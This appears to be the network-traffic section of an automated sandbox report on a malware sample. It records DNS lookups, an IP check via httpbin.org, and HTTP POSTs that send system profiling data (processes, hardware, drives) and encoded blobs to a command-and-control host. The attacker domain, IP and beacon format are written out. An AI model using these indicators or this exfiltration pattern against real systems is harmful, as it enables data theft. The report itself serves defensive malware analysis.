Dec 20, 2024 16:13:42.060971975 CET	192.168.2.5	1.1.1.1	0x9d1b	Standard query (0)	home.twentytk20ht.top	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:13:42.061033964 CET	192.168.2.5	1.1.1.1	0xc6f0	Standard query (0)	home.twentytk20ht.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 20, 2024 16:13:04.112868071 CET	1.1.1.1	192.168.2.5	0xf7cc	No error (0)	httpbin.org	98.85.100.80	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:13:04.112868071 CET	1.1.1.1	192.168.2.5	0xf7cc	No error (0)	httpbin.org	34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:13:07.046106100 CET	1.1.1.1	192.168.2.5	0x1ba	No error (0)	home.twentytk20ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:13:40.056802988 CET	1.1.1.1	192.168.2.5	0xab5b	No error (0)	home.twentytk20ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:13:42.909445047 CET	1.1.1.1	192.168.2.5	0x9d1b	No error (0)	home.twentytk20ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.twentytk20ht.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49720	185.121.15.192	80	1892	C:\Users\user\Desktop\u57m8aCdwb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:13:07.465867996 CET	12360	OUT	POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1 Host: home.twentytk20ht.top Accept: / Content-Type: application/json Content-Length: 559528 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 37 35 38 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "1734707585", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Dec 20, 2024 16:13:07.586323977 CET	7416	OUT	Data Raw: 2b 4c 6e 78 33 38 47 36 78 6f 4e 6d 62 36 2b 76 76 68 68 59 66 44 5c 2f 34 36 5c 2f 45 50 34 63 2b 47 44 64 7a 33 74 7a 66 36 6c 71 6e 68 71 36 30 54 77 31 70 55 54 2b 49 62 32 37 75 4c 75 31 31 56 35 49 64 61 6b 5c 2f 77 42 4b 74 4c 36 38 5c 2f Data Ascii: +Lnx38G6xoNmb6+vvhhYfD\/46\/EP4c+GDdz3tzf6lqnhq60Tw1pUT+Ib27uLu11V5Idak\/wBKtL68\/NSv6h8KPFzhPxe4f\/tvhuvOjicNKFHOMkxkqcczyfFTi5QhiKcJSjVw2IUZywWOo3w+KjCpFOniaGJw9D+PvGXwQ418DeJ3w\/xXh6dfCYyE8RkXEOBjVllGe4SnJRnUwtWpGMqOLwznCGPy6uo4nBznSm1VwuIw
Dec 20, 2024 16:13:07.586389065 CET	4944	OUT	Data Raw: 52 79 64 76 78 71 53 6b 59 46 76 7a 7a 58 2b 39 42 5c 2f 7a 55 6b 46 46 53 37 42 37 5c 2f 41 4f 66 77 6f 32 44 33 5c 2f 77 41 5c 2f 68 51 42 78 50 6a 6a 78 63 76 67 7a 53 49 64 55 61 77 62 55 54 50 66 77 32 43 57 34 75 52 61 41 4e 4c 42 63 33 42 Data Ascii: RydvxqSkYFvzzX+9B\/zUkFFS7B7\/AOfwo2D3\/wA\/hQBxPjjxcvgzSIdUawbUTPfw2CW4uRaANLBc3BkaYwXOFVLVhtETFmZRlRkj7x\/Yk\/4LSf8ADHHwp8QfDH\/hmz\/hY39u\/ELVfHf9t\/8AC4v+EQ+y\/wBp+HPCfh\/+yv7N\/wCFV+KPP8j\/AIRf7X9u+3w+b9u+z\/Y4\/s3nXH5ufHRQPCWnEZ\/5GO0\/9
Dec 20, 2024 16:13:07.586441994 CET	2472	OUT	Data Raw: 5c 2f 48 5c 2f 67 46 50 61 50 37 77 5c 2f 7a 2b 4e 4d 71 78 55 57 77 2b 33 2b 66 77 71 7a 73 49 4a 4f 33 34 5c 2f 30 71 44 75 5c 2f 30 48 38 71 74 4d 75 65 44 77 52 55 4c 4c 6a 67 38 67 30 41 4d 66 37 70 5c 2f 44 2b 59 70 6a 39 66 77 5c 2f 71 61 Data Ascii: \/H\/gFPaP7w\/z+NMqxUWw+3+fwqzsIJO34\/0qDu\/0H8qtMueDwRULLjg8g0AMf7p\/D+Ypj9fw\/qalprLux2xQaU+vyIah5+57\/wCfw7\/rU1M2\/Pv9sf5\/nQaEVV6sUUHQV6Y\/T8f6Gn0jAt+eaDoIP4tvf9OuKi2H2\/z+FSv\/AKw\/7o\/pRQBXqPy\/f9P\/AK9WX6fj\/Q1FQdVLp\/h\/yKr\/AHT+H8xUL
Dec 20, 2024 16:13:07.586486101 CET	7416	OUT	Data Raw: 32 53 52 76 5c 2f 43 5c 2f 2b 6a 2b 56 2b 39 5c 2f 63 54 66 6e 5c 2f 79 5c 2f 48 2b 6e 62 74 4e 4a 4a 38 75 50 75 4a 35 75 50 2b 6d 5c 2f 62 5c 2f 52 65 33 48 2b 63 55 79 52 76 37 36 62 5c 2f 41 50 6c 74 2b 37 5c 2f 35 59 5c 2f 38 41 36 36 6e 32 Data Ascii: 2SRv\/C\/+j+V+9\/cTfn\/y\/H+nbtNJJ8uPuJ5uP+m\/b\/Re3H+cUyRv76b\/APlt+7\/5Y\/8A66n2vnL+vmdBC33X3\/In\/XL9\/wD5+p\/WmeZ9zp\/396\/5\/kan2v8Acc\/P5v733471V2vIoT93tk\/5Z+V5B5\/Xnn25qgHyfu2TPmI9vmWKOWXHQd+tHlu0f3N+IvNij839\/wDZx7cD\/wCv+gdse9H\/AOeX
Dec 20, 2024 16:13:07.586607933 CET	2472	OUT	Data Raw: 2f 77 44 58 71 4f 72 46 4e 66 37 70 5c 2f 44 2b 59 6f 4f 69 6e 55 33 30 5c 2f 72 75 76 36 37 61 6b 4e 51 34 50 39 33 5c 2f 30 4c 5c 2f 47 70 71 4b 6a 6b 58 6e 5c 2f 58 79 4f 67 72 30 7a 75 6e 30 50 38 71 66 52 53 39 6e 35 5c 2f 68 5c 2f 77 51 49 Data Ascii: /wDXqOrFNf7p\/D+YoOinU30\/ruv67akNQ4P93\/0L\/GpqKjkXn\/XyOgr0zun0P8qfRS9n5\/h\/wQIn6\/h\/U0ypJO341HWht7Xzl\/XzKsvf\/e\/xpvl\/M\/Xr+H+R\/nFXKr0HUROm3+XNMqxVegKX2fn+pH5fv+n\/ANeo6sVHJ2\/Gg6Cq0f4j8qbVimP0\/H+hoNKfX5fqVvL9\/wBP\/r1HViig0KUi\/wAfp\
Dec 20, 2024 16:13:07.706224918 CET	2472	OUT	Data Raw: 36 5c 2f 63 6a 5c 2f 41 4e 56 35 66 70 30 5c 2f 5c 2f 58 5c 2f 6a 51 61 65 30 38 76 78 5c 2f 34 41 4e 73 2b 52 33 68 33 70 5c 2f 30 30 50 54 5c 2f 41 4b 65 76 58 76 56 62 37 76 33 48 2b 66 38 41 35 36 66 38 38 66 38 41 36 5c 2f 38 41 6e 6e 76 5a Data Ascii: 6\/cj\/ANV5fp0\/\/X\/jQae08vx\/4ANs+R3h3p\/00PT\/AKevXvVb7v3H+f8A56f88f8A6\/8AnnvZ+7H8iY4x+\/5\/0f8Az26\/jTSpVXfyekf8zWntPL8f+AaB\/tt8\/mfuv3f\/AC19P8agj\/6af8s\/s\/7uMHp\/z9D\/ADz1qaSPcqPvk+vmDjn7J7fYvxHSoY18v5ETyf3tx5Uf+v8A+XX9eenFZgH9\/wD65
Dec 20, 2024 16:13:07.706267118 CET	4944	OUT	Data Raw: 63 4d 46 6d 4f 49 6f 77 71 30 63 75 78 39 57 68 36 48 4a 59 7a 4b 50 6c 54 65 6e 30 2b 75 65 70 48 62 36 31 43 59 6e 55 34 5a 53 76 31 46 54 32 65 6f 32 74 31 47 4a 74 50 75 72 61 36 68 4f 4d 53 32 73 38 56 78 47 66 54 45 6b 54 4d 70 79 50 66 70 Data Ascii: cMFmOIowq0cux9Wh6HJYzKPlTen0+uepHb61CYnU4ZSv1FT2eo2t1GJtPura6hOMS2s8VxGfTEkTMpyPfp7Vofaiy7Jk87+v49v84r7eMYSSlGXNGSunFxcWu6aVmvmfnUpVoScJpxlF2kpc0Zr1i0rPyaMSit3VdNGn\/BPxV+0AZNCPgPwT8TNR+GPiizh1yQ+M9IvdK0rwXqF\/4sufDsmlpbP4GtL\/AOIvgXwzea3a6zcX
Dec 20, 2024 16:13:07.706336021 CET	2472	OUT	Data Raw: 2f 67 74 7a 2b 30 5a 32 2b 46 58 77 4e 48 31 30 33 34 68 48 2b 58 78 42 57 6f 7a 5c 2f 77 41 46 75 50 32 6b 75 33 77 74 2b 42 49 2b 75 6b 5c 2f 45 51 5c 2f 79 2b 49 79 31 2b 4f 58 68 69 78 31 58 78 6c 70 5c 2f 77 5c 2f 77 42 53 38 4f 48 77 37 64 Data Ascii: /gtz+0Z2+FXwNH1034hH+XxBWoz\/wAFuP2ku3wt+BI+uk\/EQ\/y+Iy1+OXhix1Xxlp\/w\/wBS8OHw7dQ\/EX4l\/EH4ZaXFf+JItDOh3fwq+HXhD4r\/ABD8Z+MtV1mxsvCvhX4c+EfAXjG08Ra94t1PxGkOkadpWt3mp2lnZWcNzdR+IZvBmmeEn+IXhD4w\/CP4y+A7DxNbeEPE\/ib4V33xNiHgnXtX02\/1bwvD4q0D4
Dec 20, 2024 16:13:07.706350088 CET	2472	OUT	Data Raw: 61 30 78 66 6a 31 39 4e 6a 41 51 72 7a 78 58 44 32 52 55 5c 2f 71 39 54 4d 4b 4e 57 6d 73 6f 34 66 71 34 68 56 38 6f 77 66 39 6f 5a 74 68 6f 59 57 6a 6e 46 54 45 31 63 56 6c 65 43 5c 2f 77 42 70 7a 4c 43 30 71 55 38 52 67 61 54 69 38 56 54 70 4f Data Ascii: a0xfj19NjAQrzxXD2RU\/q9TMKNWmso4fq4hV8owf9oZthoYWjnFTE1cVleC\/wBpzLC0qU8RgaTi8VTpOUU\/TvjH4\/HxX+LfxO+KK6WdDHxH+IHi\/wAdnRTdjUP7Hfxdr9\/r76UNQFvZ\/b10579rNL77HZm8WEXJs7Uym3j83rqfEHgnX\/DXw5+InxVvNV8B6p4R+E\/7Q0v7MXxDHhvxTf6prPhX4pab4Q8HeJPE1rq
Dec 20, 2024 16:13:07.706423044 CET	2472	OUT	Data Raw: 6c 70 48 5c 2f 77 41 38 50 7a 5c 2f 6e 6e 76 6a 47 61 72 79 6f 38 66 79 62 4a 4d 65 56 2b 66 38 41 6e 36 66 70 56 6a 64 35 6d 78 45 35 5c 2f 64 66 6e 37 5c 2f 35 37 66 68 54 50 6e 57 4f 5a 39 6c 78 75 5c 2f 77 43 75 76 2b 75 35 5c 2f 77 41 5c 2f Data Ascii: lpH\/wA8Pz\/nnvjGaryo8fybJMeV+f8An6fpVjd5mxE5\/dfn7\/57fhTPnWOZ9lxu\/wCuv+u5\/wA\/nQdBTCPx8\/2ZP8\/6V9fpippVeSR9iZeOXyvM\/wCe1v8A569P50fOI02bP9V5v\/TeH9OvNMk\/vyJGiZ\/5afkfb6Z\/D26DSn1+X6jH2fOhTfiX91H\/AOlf+fXj2qt8+f8AY\/66+\/X\/AD9cdqsyedt8mb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49808	185.121.15.192	80	1892	C:\Users\user\Desktop\u57m8aCdwb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:13:40.179096937 CET	12360	OUT	POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1 Host: home.twentytk20ht.top Accept: / Content-Type: application/json Content-Length: 559528 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 37 35 38 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "1734707585", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Dec 20, 2024 16:13:40.298970938 CET	4944	OUT	Data Raw: 2b 4c 6e 78 33 38 47 36 78 6f 4e 6d 62 36 2b 76 76 68 68 59 66 44 5c 2f 34 36 5c 2f 45 50 34 63 2b 47 44 64 7a 33 74 7a 66 36 6c 71 6e 68 71 36 30 54 77 31 70 55 54 2b 49 62 32 37 75 4c 75 31 31 56 35 49 64 61 6b 5c 2f 77 42 4b 74 4c 36 38 5c 2f Data Ascii: +Lnx38G6xoNmb6+vvhhYfD\/46\/EP4c+GDdz3tzf6lqnhq60Tw1pUT+Ib27uLu11V5Idak\/wBKtL68\/NSv6h8KPFzhPxe4f\/tvhuvOjicNKFHOMkxkqcczyfFTi5QhiKcJSjVw2IUZywWOo3w+KjCpFOniaGJw9D+PvGXwQ418DeJ3w\/xXh6dfCYyE8RkXEOBjVllGe4SnJRnUwtWpGMqOLwznCGPy6uo4nBznSm1VwuIw
Dec 20, 2024 16:13:40.299093008 CET	12360	OUT	Data Raw: 33 32 5c 2f 77 43 6e 37 69 44 33 5c 2f 77 41 6e 6a 36 31 5a 62 59 33 2b 77 5c 2f 38 41 79 31 34 5c 2f 4c 4a 2b 6e 5c 2f 77 42 66 76 55 58 2b 72 33 37 48 6b 38 6e 5c 2f 41 4d 67 66 35 2b 68 6f 4f 67 6a 38 77 76 73 52 2b 50 58 79 5c 2f 77 44 48 6e Data Ascii: 32\/wCn7iD3\/wAnj61ZbY3+w\/8Ay14\/LJ+n\/wBfvUX+r37Hk8n\/AMgf5+hoOgj8wvsR+PXy\/wDHn\/PNDh\/SPr\/rHlHkfT1xT2jd9iP9\/wA391c\/6j\/Pvn\/69RN950d\/+2n4UAQLGf4Cd4jJ8yT\/ANtLT+n5Y5o4\/wCmf\/TX\/nh\/19Xf4dP54qaOORm2\/u2eP0z0FQx\/NJ\/f8vtJ68\/096z9n5\/h
Dec 20, 2024 16:13:40.299434900 CET	7416	OUT	Data Raw: 71 45 56 32 33 75 33 77 6f 38 53 61 4a 34 6d 2b 46 76 67 48 57 50 44 75 72 61 66 72 65 6c 58 50 68 50 51 6b 68 31 44 54 4c 71 47 38 74 58 6b 74 74 4f 67 74 72 6d 48 7a 6f 47 5a 56 6e 74 62 6d 4b 61 33 75 37 64 79 73 31 74 63 52 79 32 38 38 63 63 Data Ascii: qEV23u3wo8SaJ4m+FvgHWPDurafrelXPhPQkh1DTLqG8tXkttOgtrmHzoGZVntbmKa3u7dys1tcRy288cc0bIOm8V\/s1eAvire3GsaX8SPin8OLrxHouk6X8V9A+EfjqDwpp\/xKsLTTodOgt\/Hdg+l6pe2WptpcI0NvFnhS48JeNLvw9Fa6NJ4lm0vT9Kgsv+WD6K+aYnhrxm8VcRicXXyLEUsj4l4ZxjxWW4nFzwzzjN3g8
Dec 20, 2024 16:13:40.418803930 CET	2472	OUT	Data Raw: 36 5c 2f 63 6a 5c 2f 41 4e 56 35 66 70 30 5c 2f 5c 2f 58 5c 2f 6a 51 61 65 30 38 76 78 5c 2f 34 41 4e 73 2b 52 33 68 33 70 5c 2f 30 30 50 54 5c 2f 41 4b 65 76 58 76 56 62 37 76 33 48 2b 66 38 41 35 36 66 38 38 66 38 41 36 5c 2f 38 41 6e 6e 76 5a Data Ascii: 6\/cj\/ANV5fp0\/\/X\/jQae08vx\/4ANs+R3h3p\/00PT\/AKevXvVb7v3H+f8A56f88f8A6\/8AnnvZ+7H8iY4x+\/5\/0f8Az26\/jTSpVXfyekf8zWntPL8f+AaB\/tt8\/mfuv3f\/AC19P8agj\/6af8s\/s\/7uMHp\/z9D\/ADz1qaSPcqPvk+vmDjn7J7fYvxHSoY18v5ETyf3tx5Uf+v8A+XX9eenFZgH9\/wD65
Dec 20, 2024 16:13:40.418864012 CET	4944	OUT	Data Raw: 63 4d 46 6d 4f 49 6f 77 71 30 63 75 78 39 57 68 36 48 4a 59 7a 4b 50 6c 54 65 6e 30 2b 75 65 70 48 62 36 31 43 59 6e 55 34 5a 53 76 31 46 54 32 65 6f 32 74 31 47 4a 74 50 75 72 61 36 68 4f 4d 53 32 73 38 56 78 47 66 54 45 6b 54 4d 70 79 50 66 70 Data Ascii: cMFmOIowq0cux9Wh6HJYzKPlTen0+uepHb61CYnU4ZSv1FT2eo2t1GJtPura6hOMS2s8VxGfTEkTMpyPfp7Vofaiy7Jk87+v49v84r7eMYSSlGXNGSunFxcWu6aVmvmfnUpVoScJpxlF2kpc0Zr1i0rPyaMSit3VdNGn\/BPxV+0AZNCPgPwT8TNR+GPiizh1yQ+M9IvdK0rwXqF\/4sufDsmlpbP4GtL\/AOIvgXwzea3a6zcX
Dec 20, 2024 16:13:40.419527054 CET	7416	OUT	Data Raw: 2f 67 74 7a 2b 30 5a 32 2b 46 58 77 4e 48 31 30 33 34 68 48 2b 58 78 42 57 6f 7a 5c 2f 77 41 46 75 50 32 6b 75 33 77 74 2b 42 49 2b 75 6b 5c 2f 45 51 5c 2f 79 2b 49 79 31 2b 4f 58 68 69 78 31 58 78 6c 70 5c 2f 77 5c 2f 77 42 53 38 4f 48 77 37 64 Data Ascii: /gtz+0Z2+FXwNH1034hH+XxBWoz\/wAFuP2ku3wt+BI+uk\/EQ\/y+Iy1+OXhix1Xxlp\/w\/wBS8OHw7dQ\/EX4l\/EH4ZaXFf+JItDOh3fwq+HXhD4r\/ABD8Z+MtV1mxsvCvhX4c+EfAXjG08Ra94t1PxGkOkadpWt3mp2lnZWcNzdR+IZvBmmeEn+IXhD4w\/CP4y+A7DxNbeEPE\/ib4V33xNiHgnXtX02\/1bwvD4q0D4
Dec 20, 2024 16:13:40.460881948 CET	27192	OUT	Data Raw: 42 66 54 50 2b 43 6d 33 69 5c 2f 58 5c 2f 41 4e 6e 5c 2f 41 4d 57 36 37 38 53 5c 2f 68 6a 34 31 30 48 57 66 69 36 76 37 58 36 66 46 54 34 38 65 41 34 76 47 48 77 31 38 4e 5c 2f 45 58 34 58 2b 44 70 66 32 61 48 2b 49 46 72 38 44 64 61 2b 4b 66 69 Data Ascii: BfTP+Cm3i\/X\/ANn\/AMW678S\/hj410HWfi6v7X6fFT48eA4vGHw18N\/EX4X+Dpf2aH+IFr8Dda+Kfia+0bSl0nUb7Wz5\/4l\/aD+IPhf4RfF74o+Jfj5r\/AMZvjj+y94vkH7MvxZ0a+8a+ItI+KvxR\/bB8Dah4U0q31LWPi3pnhj4gi5+CXiz4fa3+0n4Ktdc8N6Drkl\/ZeM5L6zYSwQy+tL4a8OqpRdA0VUbO5F0qx
Dec 20, 2024 16:13:40.580748081 CET	8652	OUT	Data Raw: 31 6e 78 47 49 45 31 71 36 6b 31 65 77 75 66 37 48 32 5c 2f 7a 47 31 5c 2f 62 50 2b 79 5a 38 4c 5c 2f 32 6a 64 5a 5c 2f 34 4e 31 50 46 33 67 6a 52 62 50 54 4e 5a 2b 4c 6e 78 4e 38 41 5c 2f 47 79 77 5c 2f 5a 39 38 4b 33 79 77 57 50 6a 50 55 76 67 Data Ascii: 1nxGIE1q6k1ewuf7H2\/zG1\/bP+yZ8L\/2jdZ\/4N1PF3gjRbPTNZ+LnxN8A\/Gyw\/Z98K3ywWPjPUvgb4l8ZDxF438F+H\/OSTVdd1fxX4X0T4l+LvC+i6eJP7Z0+\/wDCdssaWttbz2\/8TTKyMyOrK6sVZWBVlZThlZTghgQQQRkHg1+hcdZfhcHhuEq+Fy+OB\/tDh7DYyr7PCww8ZVKkacnRqTppfWcRR5vazrVnLFSo
Dec 20, 2024 16:13:40.624979973 CET	1236	OUT	Data Raw: 34 55 78 6d 54 35 4e 5c 2f 32 66 5a 4a 39 6e 36 66 54 76 64 5c 2f 7a 6f 4f 67 70 5c 2f 50 75 66 59 68 64 49 5c 2f 33 32 66 2b 65 4f 4f 68 5c 2f 45 66 6e 36 30 77 53 50 74 66 5a 5c 2f 77 42 74 66 4c 69 38 5c 2f 76 38 41 35 5c 2f 7a 30 6c 5c 2f 35 Data Ascii: 4UxmT5N\/2fZJ9n6fTvd\/zoOgp\/PufYhdI\/32f+eOOh\/Efn60wSPtfZ\/wBtfLi8\/v8A5\/z0l\/5ZJ8kj0u5P4P45fKl+z\/h9Mf59aDSn1+X6jdvyw\/6v\/W\/uvMi\/13\/X36GoPLTc6JDJ+7l\/e\/vf9V\/9f\/JParPz\/I0HmD\/yPm2\/+t3pnmImxP3aJHL5X\/Pfvj\/D+tBoVlkTaX2xv5cvb\/ll9f8A
Dec 20, 2024 16:13:40.834007025 CET	1236	OUT	Data Raw: 4e 2b 4b 33 67 37 52 34 37 66 55 66 45 4f 72 66 43 4c 34 61 69 4f 54 58 39 58 30 71 4c 53 4a 34 4c 69 44 78 74 72 39 76 6f 66 67 74 6f 74 52 30 2b 38 30 37 56 64 62 4d 39 76 59 33 58 70 47 70 5c 2f 38 45 63 5c 2f 67 54 6f 5c 2f 78 6d 74 76 32 65 Data Ascii: N+K3g7R47fUfEOrfCL4aiOTX9X0qLSJ4LiDxtr9vofgtotR0+807VdbM9vY3XpGp\/8Ec\/gTo\/xmtv2e9T\/AOCjXhXSvjHe+NtG+Hdr4J1r9k39oXR7ybxb4i1Oy0nQdPGpXtomhraavd6jYPp2utqg8P3dheW2rQ6o2lTJet9I\/wDBQn\/gqB47\/ZX+PH7WnwQ+B3w0tfAv7SXik+FPhj8Vv2sbn4kaz4x1vT\/BOk+Cv
Dec 20, 2024 16:13:41.455035925 CET	212	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49814	185.121.15.192	80	1892	C:\Users\user\Desktop\u57m8aCdwb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:13:43.031569958 CET	287	OUT	POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1 Host: home.twentytk20ht.top Accept: / Content-Type: application/json Content-Length: 143 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Dec 20, 2024 16:13:44.310794115 CET	212	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49714	98.85.100.80	443	1892	C:\Users\user\Desktop\u57m8aCdwb.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 15:13:05 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-20 15:13:06 UTC	224	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:13:06 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
